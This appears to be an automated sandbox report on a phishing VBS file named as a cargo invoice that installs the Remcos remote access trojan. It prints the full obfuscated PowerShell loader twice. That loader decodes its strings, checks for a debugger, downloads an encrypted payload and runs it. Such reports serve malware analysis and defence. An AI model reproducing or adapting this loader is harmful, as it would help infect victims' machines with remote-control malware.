File name:

CargoInvoice_Outstanding_56789_2024-11-21.vbs

Full analysis: https://app.any.run/tasks/6d938a9f-6c37-4ec9-9c36-41bd2da6c456
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: November 24, 2024, 07:12:38
OS: Windows 11 Professional (build: 22000, 64 bit)
Tags:
gumen
rat
remcos
remote
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (1991), with CRLF line terminators
MD5:

E221E50773F32BAB23FCF3D130C68481

SHA1:

350BD0A28A1CBFFB8A9E4F9075CEC81895798A80

SHA256:

602003E98421CE67063784195FD50CAA107F895549F55EFC60BF569E605F61F2

SSDEEP:

768:IZLtB89wlVgpDAus1yZUR/eGR4/3yLohsVgIij/+gHxWseNAeonfre7st2r:IZJB8rDds1yGRm+4/kLiD+goRNAnXtu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GUMEN has been detected

      • powershell.exe (PID: 1288)
      • powershell.exe (PID: 7056)
    • Accesses system services(Win32_Service) via WMI (SCRIPT)

      • wscript.exe (PID: 3356)
    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 2536)
  • SUSPICIOUS

    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • wscript.exe (PID: 3356)
    • Reads the Internet Settings

      • wscript.exe (PID: 3356)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 3356)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3356)
    • Get information on the list of running processes

      • wscript.exe (PID: 3356)
    • Suspicious use of symmetric encryption in PowerShell

      • wscript.exe (PID: 3356)
    • Accesses WMI object display name (SCRIPT)

      • wscript.exe (PID: 3356)
    • Executes WMI query (SCRIPT)

      • wscript.exe (PID: 3356)
    • Accesses system date via WMI (SCRIPT)

      • wscript.exe (PID: 3356)
    • Contacting a server suspected of hosting an CnC

      • msiexec.exe (PID: 2536)
    • Connects to unusual port

      • msiexec.exe (PID: 2536)
  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 3356)
    • Manual execution by a user

      • powershell.exe (PID: 1288)
    • The process uses the downloaded file

      • wscript.exe (PID: 3356)
    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 3356)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
118
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe #GUMEN powershell.exe conhost.exe no specs #GUMEN powershell.exe no specs conhost.exe no specs #REMCOS msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
1288"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Predenying Kloakeringsarbejde Chambrierers Urbaniteten persongruppers Alhandal #><#Telegrafvsnets Metallurgy sundari Kvlning Bleachyard Charlataneriet #>$Omringede='Kommandoaktions';function Cypseliform($Foretagendes){If ($host.DebuggerEnabled) {$Ureteropyelitis=3} for ($Arther85=$Ureteropyelitis;;$Arther85+=4){if(!$Foretagendes[$Arther85]) { break }$Dewaters+=$Foretagendes[$Arther85]}$Dewaters}function Pattede($Overanstrengelses){ .($Histography) ($Overanstrengelses)}$serievarerne=Cypseliform ' UsN Afe .htLgm.OnowCl,e BoBPlecsitLAkkIFo etwin oct';$sprogforskernes=Cypseliform ',mpMFoloCanz seiEl lelels gaNat/';$Metabolisme=Cypseliform 'Di TNatlknasTr,1Teg2';$Damaskduge36='Tel[Conn kuEPaaTTi,.dumsNunEsp.rPrevdelIUnmCGamENaupKatoFori .rNCirt iMranA enNBenAsprGante GrRAnd] Br:s,a:AntsDe ERavClg.UF rrUnmIRobtvanYAntpUkarE ro RetFlhoOveC hio Fil,it=Ana$.rgMT,ueI fT stARe,bGlio,haLD ciFixsEn,MFave';$sprogforskernes+=Cypseliform 'spe5Aho. Pn0 B. r(UneWPeriPlanWeed ,ioGalwB,ns n AntNZygT T sul1Ove0 .u. r0 Wh;Gip AadWGamiUmrn sa6Be,4Cha;saz Fesxsr 6 Na4Uds;sta Ignr s vkon: Bo1.ef3Fr 1 E .Til0Mel) fu D,pGsl eBlocDeskN tosko/ tr2ski0 Di1 el0 oo0bro1Gaa0str1Fil Ty FJavitrarForeFarfNago EkxU s/N t1say3ski1 Ac.Pas0';$Roomies=Cypseliform ' s UK ms ReePinRMul-NitaUnpgTndeP.an ot';$spyttekummerne=Cypseliform 'DrahR stCints mpF rs re:Hjt/Fej/ForbNa 9tilaTa,1sub..asiY gcTriu rs/UndXL br KoCChaG beXFo.V esfKabsHol/selTMinr isuOkas PitslulFnoeKli2 Ge0Rec.c.eaE tssubd';$supercanonical=Cypseliform ' ,v>';$Histography=Cypseliform 'stai KbeProX';$saliences109='Perfiditet';$fabaceae='\Afprikningen.Bss';Pattede (Cypseliform 'h i$GoigConL hoOPanBMisAParLLen:AfbEdriKDras toasteMs.eELacnT lsU dssu T s.T ,oEleiTpro= l$LigE H,NHerVP l: seA ,aPP ePNasDDraaIntt,ibA e+Des$RacfordaswiBW naEbuCHypEMolALege');Pattede (Cypseliform 'Ano$sc,GU gl,adospebaktaUdllU d:Da,bRe.uBrynunpITrinCoogB,iE airNatNFlaEUnhsPar=Cub$Af sYeoPFriYu at sTB geKn KUncuLurm BuMGloETrarDi n HuEt i.Fifs InPBanL.ili AnTRes( Ja$ lasZomUMyrP skEPenrArtCEvaa C nrevoskln Cri ykCDraA MeLBil)');Pattede (Cypseliform $Damaskduge36);$spyttekummerne=$Buningernes[0];$Antagonization130=(Cypseliform 'Pos$BaggA ilBreOUnvbAlbasclLsyk:si.a M tTo CPr =sumNsulECarWCy,-ZebOconb ajPh E JaCshat Ra Pers suy rmsBe tM,keUp mBor.Dep$Unas pleEndr fvIRetE.rnVRabAOplR V.E ncRAntnsjle');Pattede ($Antagonization130);Pattede (Cypseliform 'ges$ ,yAs atColcfor.DagHspreTa,a ord rieTo rBris e[Lan$ BiR,ytoOveoK.gm AliRe eudlsIct]Oof=Adm$T ps iprearClaoAwfgswaf FjoOrdrsphsDdmkR,neIndrPhynT reCo.s');$Civicism=Cypseliform ' s $BlrAEsttsupc ik.,irD,eaoPi wFr nLarlAnaodiaaBold.ecFHaviImml C es,e(Fri$Fors Uppsp.yThotOdyt eeGibkCleu fsmLasm MeevirrCrinVeneR g,a l$DisK stoM rk re ,yt P t R e BlrMaje Fot k )';$Koketteret=$Eksamenssttet;Pattede (Cypseliform 'Udd$.rugAlvlOblosasBDevACluLLi :Elav nivokrseru ulA aeDeiN slsVile Bun,ph=Lok(F.uT V e ResDu Tspl-Begp LiABestU phTil Bi.$RehK Vao GekskresavTEcttMi e BlRstjE aTC,r)');while (!$Virulensen) {Pattede (Cypseliform 'Reb$UnsgUnflBgeo arbMyoaimpl Fo: pak BluD wnMims M t.ipfDecoF ir ursUnetRumaNednClidFla=Fje$ GuU rok UneMesnsged .weMajlMe iDu gLashUnaePand') ;Pattede $Civicism;Pattede (Cypseliform 'C,ts LoTCenAGa R .uTImp-F rs Mol MiEUnpEkaePBol M.o4');Pattede (Cypseliform 'Lin$samg ChLsprO ab BuAK,nLdis:ReuVMrkiBehRB.fu Del Unesn.nbrys oe rNEry=.or(Pr tUnee ersFreT Kv-stapma aud,TEl.hP r ,fv$R cK oroBeeKskbekulTspotM re dR.ule sptDyr)') ;Pattede (Cypseliform 'Pyr$AlcG stl oOsi BEx asamls,r:UnstafbiD uO V lFulOUr gGyniCloEB,sn Bes Co=Co,$H.rGBoll Tiose b seAPool hr:.dbm C,e KoTMelastiGHy ABals tjTh eECe.rCon+Es +Adn% .o$LigB auAsyNP oI sknNdrgNipEGrerM,snBureC,rs or. N cHano irUrowN .lt') ;$spyttekummerne=$Buningernes[$Tiologiens]}$straighted=312945;$sprngbombes=29375;Pattede (Cypseliform ' G $HerGturl RtoVi B DrA LelT,i:HvnmBruAChiCBasrDeboTasCPenEshiP ndHAleADamlV dO PauP esRe, En=Coa Kodg R ETiltPre-sk C ndOsubn ittErseBrnn I.Tskr Ben$R gK s oImpk roeAbsTKasT UdECapRb geForT');Pattede (Cypseliform 'Alv$slagKlul Fio subLy,aBagl il: ,oRH.reK.rssp,bgenoPoslU iiU,dgcivs Gy Rub= Fn Man[ nts E ysersV rt Beed,nmCir.OveCDisoillnR vv sheNedr omtDe.] ak:Reg: frFAmerAd oIchm DrB exaK tsNecesam6sem4Dens stVolrCo.i Tyn.atg .a(Kar$U eMProa nscDy,r muoJazcPere kp Kvh C.aMellPoko ulu ,lsBat)');Pattede (Cypseliform 'sp.$TrkGLe Lt,mOVirb D,aTilLFor:Hy bOrilF,raGredDolsKrymBe,RIndeJugRHyleErhssoc Hyp= na Rev[JausPl,ysk sPalt AbeRy.m Ca. s tTitEDomX amT Ar.ZareF,jN rCHinOR iDnatICh n Mig In]Ka :Tr : vraBefssagC K,IPerIAnt.RejgscoE ,ctM lsBortHa rChris mnselg Va( R $PlarskaeCh sPo,BUndoA llOpsisp.GDy.sLex)');Pattede (Cypseliform 'Ru $Gragd.ml cpORefbU raDisLYur: gesRo,P UdgL dE,igsEt =spa$DolbUngltaca U dAf sPapM KvrskoEs mR.one Bas M .Tousgrau RhBI,ys AntBesr F IGo nQuogs.l(Cho$Vars betGlarsnuaDraIsw,gUayHMustRygE ,eDUdh,Unc$ K.s ecpAg.R E n egg FoB AlOVigmcrebetee Grs ag)');Pattede $spges;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
2536"C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.22000.653 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
3356"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\CargoInvoice_Outstanding_56789_2024-11-21.vbsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3828\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
5768\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
7056"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Predenying Kloakeringsarbejde Chambrierers Urbaniteten persongruppers Alhandal #><#Telegrafvsnets Metallurgy sundari Kvlning Bleachyard Charlataneriet #>$Omringede='Kommandoaktions';function Cypseliform($Foretagendes){If ($host.DebuggerEnabled) {$Ureteropyelitis=3} for ($Arther85=$Ureteropyelitis;;$Arther85+=4){if(!$Foretagendes[$Arther85]) { break }$Dewaters+=$Foretagendes[$Arther85]}$Dewaters}function Pattede($Overanstrengelses){ .($Histography) ($Overanstrengelses)}$serievarerne=Cypseliform ' UsN Afe .htLgm.OnowCl,e BoBPlecsitLAkkIFo etwin oct';$sprogforskernes=Cypseliform ',mpMFoloCanz seiEl lelels gaNat/';$Metabolisme=Cypseliform 'Di TNatlknasTr,1Teg2';$Damaskduge36='Tel[Conn kuEPaaTTi,.dumsNunEsp.rPrevdelIUnmCGamENaupKatoFori .rNCirt iMranA enNBenAsprGante GrRAnd] Br:s,a:AntsDe ERavClg.UF rrUnmIRobtvanYAntpUkarE ro RetFlhoOveC hio Fil,it=Ana$.rgMT,ueI fT stARe,bGlio,haLD ciFixsEn,MFave';$sprogforskernes+=Cypseliform 'spe5Aho. Pn0 B. r(UneWPeriPlanWeed ,ioGalwB,ns n AntNZygT T sul1Ove0 .u. r0 Wh;Gip AadWGamiUmrn sa6Be,4Cha;saz Fesxsr 6 Na4Uds;sta Ignr s vkon: Bo1.ef3Fr 1 E .Til0Mel) fu D,pGsl eBlocDeskN tosko/ tr2ski0 Di1 el0 oo0bro1Gaa0str1Fil Ty FJavitrarForeFarfNago EkxU s/N t1say3ski1 Ac.Pas0';$Roomies=Cypseliform ' s UK ms ReePinRMul-NitaUnpgTndeP.an ot';$spyttekummerne=Cypseliform 'DrahR stCints mpF rs re:Hjt/Fej/ForbNa 9tilaTa,1sub..asiY gcTriu rs/UndXL br KoCChaG beXFo.V esfKabsHol/selTMinr isuOkas PitslulFnoeKli2 Ge0Rec.c.eaE tssubd';$supercanonical=Cypseliform ' ,v>';$Histography=Cypseliform 'stai KbeProX';$saliences109='Perfiditet';$fabaceae='\Afprikningen.Bss';Pattede (Cypseliform 'h i$GoigConL hoOPanBMisAParLLen:AfbEdriKDras toasteMs.eELacnT lsU dssu T s.T ,oEleiTpro= l$LigE H,NHerVP l: seA ,aPP ePNasDDraaIntt,ibA e+Des$RacfordaswiBW naEbuCHypEMolALege');Pattede (Cypseliform 'Ano$sc,GU gl,adospebaktaUdllU d:Da,bRe.uBrynunpITrinCoogB,iE airNatNFlaEUnhsPar=Cub$Af sYeoPFriYu at sTB geKn KUncuLurm BuMGloETrarDi n HuEt i.Fifs InPBanL.ili AnTRes( Ja$ lasZomUMyrP skEPenrArtCEvaa C nrevoskln Cri ykCDraA MeLBil)');Pattede (Cypseliform $Damaskduge36);$spyttekummerne=$Buningernes[0];$Antagonization130=(Cypseliform 'Pos$BaggA ilBreOUnvbAlbasclLsyk:si.a M tTo CPr =sumNsulECarWCy,-ZebOconb ajPh E JaCshat Ra Pers suy rmsBe tM,keUp mBor.Dep$Unas pleEndr fvIRetE.rnVRabAOplR V.E ncRAntnsjle');Pattede ($Antagonization130);Pattede (Cypseliform 'ges$ ,yAs atColcfor.DagHspreTa,a ord rieTo rBris e[Lan$ BiR,ytoOveoK.gm AliRe eudlsIct]Oof=Adm$T ps iprearClaoAwfgswaf FjoOrdrsphsDdmkR,neIndrPhynT reCo.s');$Civicism=Cypseliform ' s $BlrAEsttsupc ik.,irD,eaoPi wFr nLarlAnaodiaaBold.ecFHaviImml C es,e(Fri$Fors Uppsp.yThotOdyt eeGibkCleu fsmLasm MeevirrCrinVeneR g,a l$DisK stoM rk re ,yt P t R e BlrMaje Fot k )';$Koketteret=$Eksamenssttet;Pattede (Cypseliform 'Udd$.rugAlvlOblosasBDevACluLLi :Elav nivokrseru ulA aeDeiN slsVile Bun,ph=Lok(F.uT V e ResDu Tspl-Begp LiABestU phTil Bi.$RehK Vao GekskresavTEcttMi e BlRstjE aTC,r)');while (!$Virulensen) {Pattede (Cypseliform 'Reb$UnsgUnflBgeo arbMyoaimpl Fo: pak BluD wnMims M t.ipfDecoF ir ursUnetRumaNednClidFla=Fje$ GuU rok UneMesnsged .weMajlMe iDu gLashUnaePand') ;Pattede $Civicism;Pattede (Cypseliform 'C,ts LoTCenAGa R .uTImp-F rs Mol MiEUnpEkaePBol M.o4');Pattede (Cypseliform 'Lin$samg ChLsprO ab BuAK,nLdis:ReuVMrkiBehRB.fu Del Unesn.nbrys oe rNEry=.or(Pr tUnee ersFreT Kv-stapma aud,TEl.hP r ,fv$R cK oroBeeKskbekulTspotM re dR.ule sptDyr)') ;Pattede (Cypseliform 'Pyr$AlcG stl oOsi BEx asamls,r:UnstafbiD uO V lFulOUr gGyniCloEB,sn Bes Co=Co,$H.rGBoll Tiose b seAPool hr:.dbm C,e KoTMelastiGHy ABals tjTh eECe.rCon+Es +Adn% .o$LigB auAsyNP oI sknNdrgNipEGrerM,snBureC,rs or. N cHano irUrowN .lt') ;$spyttekummerne=$Buningernes[$Tiologiens]}$straighted=312945;$sprngbombes=29375;Pattede (Cypseliform ' G $HerGturl RtoVi B DrA LelT,i:HvnmBruAChiCBasrDeboTasCPenEshiP ndHAleADamlV dO PauP esRe, En=Coa Kodg R ETiltPre-sk C ndOsubn ittErseBrnn I.Tskr Ben$R gK s oImpk roeAbsTKasT UdECapRb geForT');Pattede (Cypseliform 'Alv$slagKlul Fio subLy,aBagl il: ,oRH.reK.rssp,bgenoPoslU iiU,dgcivs Gy Rub= Fn Man[ nts E ysersV rt Beed,nmCir.OveCDisoillnR vv sheNedr omtDe.] ak:Reg: frFAmerAd oIchm DrB exaK tsNecesam6sem4Dens stVolrCo.i Tyn.atg .a(Kar$U eMProa nscDy,r muoJazcPere kp Kvh C.aMellPoko ulu ,lsBat)');Pattede (Cypseliform 'sp.$TrkGLe Lt,mOVirb D,aTilLFor:Hy bOrilF,raGredDolsKrymBe,RIndeJugRHyleErhssoc Hyp= na Rev[JausPl,ysk sPalt AbeRy.m Ca. s tTitEDomX amT Ar.ZareF,jN rCHinOR iDnatICh n Mig In]Ka :Tr : vraBefssagC K,IPerIAnt.RejgscoE ,ctM lsBortHa rChris mnselg Va( R $PlarskaeCh sPo,BUndoA llOpsisp.GDy.sLex)');Pattede (Cypseliform 'Ru $Gragd.ml cpORefbU raDisLYur: gesRo,P UdgL dE,igsEt =spa$DolbUngltaca U dAf sPapM KvrskoEs mR.one Bas M .Tousgrau RhBI,ys AntBesr F IGo nQuogs.l(Cho$Vars betGlarsnuaDraIsw,gUayHMustRygE ,eDUdh,Unc$ K.s ecpAg.R E n egg FoB AlOVigmcrebetee Grs ag)');Pattede $spges;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
Total events
28 177
Read events
28 158
Write events
19
Delete events
0

Modification events

(PID) Process:(3356) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3356) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3356) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3356) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2536) msiexec.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2536) msiexec.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2536) msiexec.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2536) msiexec.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2536) msiexec.exeKey:HKEY_CURRENT_USER\Software\Rmc-KC5V8F
Operation:writeName:exepath
Value:
8E1FEBC8620444BA00BACCCADB7FD9C1251A7FFAB6B81E389C1A3066205B2C3AD0B52AB8AB7C68DB3DAAAC30D005AE9C21E3829046D0B6AC392B2C94B1619EC0
(PID) Process:(2536) msiexec.exeKey:HKEY_CURRENT_USER\Software\Rmc-KC5V8F
Operation:writeName:licence
Value:
F2692466BFB633C920C27502AE95F037
Executable files
0
Suspicious files
4
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
3356wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:5776EE443BF46FC3E615B0C79E0257D3
SHA256:DF5F1F1D7DDC3CEE41041743C386674688CADFF23C90D1331DC584E89BA0A857
3356wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:1C15A50FE98F38456832FA1CA18A55D1
SHA256:E3B83384ECC140D4A7179C9F023B7A45FFD957D2BBB4DB748FE1670CFF6C5BC7
7056powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_axcmltya.5pp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7056powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ow055txy.alf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7056powershell.exeC:\Users\admin\AppData\Roaming\Afprikningen.Bsstext
MD5:4E7A6D79FE973B189588CCBCDA5D8F3F
SHA256:E272B44348B3D46E50DB5D58E8FC8088F7FEB005A375C33127873B187BAB8E44
7056powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:0317AFA303B2EBCD00EDFBF2DA0D30DA
SHA256:369C16D38886F3EAB85C85285E393632652212201C4E0182A868A4C465A271E3
7056powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:0BD3721070E07F2E7A5FB9B05126A82F
SHA256:4559E808EDAB7296E5EA738BCFB32D00F73901BA92E4B7C83923A0DC7957F12C
1288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3cnfvwst.3dj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1288powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:EE42475E5B9C33A6E45E888B25FF3454
SHA256:14A8C302208213612BD80449D817BB7DCD43658BB179934C26DB2437708A80A7
1288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5pjtoogs.cwr.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
22
TCP/UDP connections
105
DNS requests
37
Threats
158

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3356
wscript.exe
GET
304
23.32.238.232:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11c106780f1c0b7c
DE
whitelisted
6308
firefox.exe
POST
200
95.101.74.224:80
http://r10.o.lencr.org/
NL
binary
504 b
whitelisted
6308
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
US
binary
471 b
whitelisted
6308
firefox.exe
POST
200
192.229.221.95:80
http://ocsp.digicert.com/
US
binary
471 b
whitelisted
6308
firefox.exe
POST
200
95.101.74.223:80
http://r10.o.lencr.org/
NL
binary
504 b
whitelisted
GET
200
52.113.194.132:443
https://ecs.office.com/config/v2/Office/officeclicktorun/16.0.16626.20134/Production/CC?&Clientid=%7b80C2A92B-EDEE-479E-8470-DBC6C547F2FB%7d&Application=officeclicktorun&Platform=win32&Version=16.0.16626.20134&MsoVersion=16.0.16626.20134&ProcessName=officec2rclient.exe&Audience=Production&Build=ship&Architecture=x64&OsVersion=10.0&OsBuild=22000&Channel=CC&InstallType=C2R&SessionId=%7b79CFCBA1-DD80-479A-A331-2970C8F46647%7d&LabMachine=false
US
binary
79.0 Kb
whitelisted
1296
svchost.exe
GET
200
88.221.110.147:80
http://www.msftconnecttest.com/connecttest.txt
DE
text
22 b
whitelisted
GET
200
13.107.6.156:443
https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api/v1/C2RTargetAudienceData?omid=97560490bafb0d49bca6f8f0df91025d&susid=c408ee57-2103-4c34-9e6f-30bdf6c87e50&audienceFFN=492350f6-3a01-4f97-b9c0-c7c6ddf67d60&tid=&osver=Client%7C10.0.22000&offver=16.0.16626.20134&ring=Production&aud=Production&ch=CC&osarch=x64&manstate=6
US
binary
195 b
whitelisted
GET
200
34.160.144.191:443
https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-12-27-18-19-47.chain
US
text
5.22 Kb
whitelisted
GET
200
35.190.72.216:443
https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
US
binary
47 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
5552
svchost.exe
239.255.255.250:1900
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
52.109.76.240:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
34.120.208.123:443
incoming.telemetry.mozilla.org
GOOGLE-CLOUD-PLATFORM
US
whitelisted
34.149.100.209:443
firefox.settings.services.mozilla.com
GOOGLE
US
whitelisted
1296
svchost.exe
88.221.110.147:80
Akamai International B.V.
DE
unknown
3356
wscript.exe
23.32.238.232:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
whitelisted
6308
firefox.exe
95.101.74.224:80
r10.o.lencr.org
Akamai International B.V.
NL
whitelisted
6308
firefox.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
incoming.telemetry.mozilla.org
  • 34.120.208.123
whitelisted
firefox.settings.services.mozilla.com
  • 34.149.100.209
whitelisted
telemetry-incoming.r53-2.services.mozilla.com
  • 34.120.208.123
whitelisted
prod.remote-settings.prod.webservices.mozgcp.net
  • 34.149.100.209
whitelisted
google.com
  • 142.250.186.174
whitelisted
ctldl.windowsupdate.com
  • 23.32.238.232
  • 23.32.238.211
  • 23.32.238.242
  • 23.32.238.192
  • 23.32.238.169
  • 199.232.214.172
  • 199.232.210.172
whitelisted
r10.o.lencr.org
  • 95.101.74.224
  • 95.101.74.223
whitelisted
a1887.dscq.akamai.net
  • 95.101.74.224
  • 95.101.74.223
  • 2a02:26f0:3100::1735:2a18
  • 2a02:26f0:3100::1735:29f0
whitelisted

Threats

PID
Process
Class
Message
1296
svchost.exe
Misc activity
ET INFO Microsoft Connection Test
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
7056
powershell.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.icu) in TLS SNI
2536
msiexec.exe
A Network Trojan was detected
